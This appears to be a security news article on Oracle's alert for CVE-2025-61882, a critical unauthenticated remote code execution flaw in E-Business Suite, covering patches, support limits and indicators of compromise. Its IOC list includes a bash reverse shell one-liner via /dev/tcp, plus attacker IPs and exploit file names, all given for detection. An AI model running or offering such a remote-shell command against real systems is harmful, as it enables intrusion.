Oracle has issued a security alert warning users of a zero-day vulnerability in its widely used Oracle E-Business Suite. Tracked as CVE-2025-61882, this flaw allows unauthenticated, remote attackers to execute arbitrary code on affected systems. The vulnerability carries a CVSS v3.1 base score of 9.8, making it one of the most critical threats to the platform to date.
What CVE-2025-61882 Targets
According to Oracle’s advisory, CVE-2025-61882 resides in the Concurrent Processing component of the E-Business Suite, specifically within the BI Publisher Integration. Exploitable via HTTP, the flaw does not require user credentials or interaction and can be executed over a network.
The risk matrix published with the alert shows that the attack vector is “Network,” with low complexity and no privileges needed. Successful exploitation results in a high impact on confidentiality, integrity, and availability. Oracle categorically states:
“This vulnerability is remotely exploitable without authentication… If successfully exploited, it may result in remote code execution.”
The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14. Oracle strongly urges all customers to apply the necessary security updates without delay.
Affected Versions, Patch Requirements, and Support Limitations
Before installing the patch that addresses CVE-2025-61882, users must ensure their systems have already applied the October 2023 Critical Patch Update (CPU). This earlier update is a prerequisite for applying the current fixes released in the October 2025 alert.
Oracle notes that only versions under Premier Support or Extended Support, as defined by its Lifetime Support Policy, will receive patches. Systems running out-of-support versions are not tested against this vulnerability and remain at risk, even if technically vulnerable.
The company’s guidance stresses:
“Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.”
Affected product and patch information is available through Oracle’s Patch Availability Document, which provides step-by-step installation instructions tailored to each supported version.
Detection, Indicators of Compromise, and Immediate Mitigation Steps
Oracle has included a comprehensive set of Indicators of Compromise (IOCs) to help organizations detect and respond to potential attacks involving CVE-2025-61882. The list includes suspicious IP addresses, observed shell commands, and SHA‑256 hashes of known exploit files.
Key Indicators of Compromise:
Suspicious IPs:
- 200[.]107[.]207[.]26
- 185[.]181[.]60[.]11
Malicious Command:
- sh -c /bin/bash -i >& /dev/tcp// 0>&1
Associated File Hashes and Exploit Samples:
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- exp.py, server.py – each with associated SHA-256 hashes.
Additionally, a public detection method is now available on GitHub. This tool identifies outdated E-Business Suite instances by checking if the HTTP response contains the string “E-Business Suite Home Page” and if the Last-Modified header shows a timestamp before October 4, 2025 (Unix timestamp 1759602752). The method is strictly for defensive use and not designed as an exploit.
Oracle also reminds administrators that the protocol listing in the risk matrix (HTTP) implies all secure variants (such as HTTPS) are affected as well. For users, it is advised to update to supported versions, apply the October 2023 CPU if not already done, and immediately install the October 2025 patch. Meanwhile, monitoring systems for the listed IOCs can help detect and contain potential exploitation attempts already underway.
